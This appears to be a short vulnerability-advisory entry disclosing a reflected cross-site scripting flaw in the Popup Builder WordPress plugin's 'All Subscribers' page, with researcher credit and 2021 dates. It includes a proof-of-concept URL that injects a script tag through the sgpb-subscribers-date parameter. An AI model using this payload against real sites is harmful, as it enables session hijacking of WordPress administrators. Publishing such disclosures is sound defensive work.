The "All Subscribers" setting page of Popup Builder was vulnerable to reflected Cross-Site Scripting.
http://example.com/wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscribers-date=%22%3E%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E Video: https://mega.nz/file/H81iGSgC#Ya8zwHd0MuUXaUv61LsRn7HW0wgGOfYN2xvDkWuGCMg
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Nguyen Anh Tien
Yes
2021-02-02 (about 2 years ago)
2021-02-02 (about 2 years ago)
2021-02-03 (about 2 years ago)